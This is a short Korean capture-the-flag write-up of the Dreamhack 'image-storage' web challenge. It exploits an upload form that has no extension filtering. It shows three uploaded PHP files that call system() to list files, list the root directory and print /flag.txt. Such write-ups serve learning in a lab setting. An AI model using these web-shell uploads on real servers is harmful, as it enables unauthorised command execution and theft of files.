[ dreamhack ] - [ web | image-storage ]

파일 업로드 취약점에 대한 문제로 보인다.

 

---

 

주어진 페이지로 접속한 후, Upload 페이지에 들어가면 

위 그림처럼 파일을 올릴 수 가 있다.

 

---

주어진 php 코드르 보니, 

업로드 파일에 대한 확장자 필터링은 존재하지 않는 것으로 보인다.

그래서, php 코드 파일을 만들어서 

서버의 명령어를 실행하는 명령을 실행해보도록 하자.

---

먼저,

<?php
	system("ls");
?>

라고 코드를 만들어서

현재위치에서의 파일들을 먼저 출력해보자.

(파일명 : get_flag4.php)

---

업로드 완료.

---

 

list 페이지로 가서 업로드된

get_flag4.php 를 클릭.

---

 

!! 파일 목록이 출력되었다.

그러나 아쉽게도 list위치에는 flag.txt는 없다는 것을 알 수 있다.

---

flag.txt 가 어느 위치에 있는지 알아내기  위해

최상위 폴더부터 리스트를 출력하는 명령어를 입력하고 업로드 하겠다.

파일명 : get_flag5.php

<?php
	system("ls /");
?>

 

---

 

 

파일이 업로드 되었고 들어가보겠다.

 

---

최상위 폴더에 flag.txt 가 존재함을 알 수 있다.

 

---

그렇다면, 최상위 폴더에 있는 flag.txt 를 출력하도록 코드를 수정하여 업로드하자.

파일명 : get_flag6.php

<?php
	system("cat /flag.txt");

?>

---

 

 

 

업로드 완료. 클릭하면 ?

---

 

 

flag.txt 가 출력된다.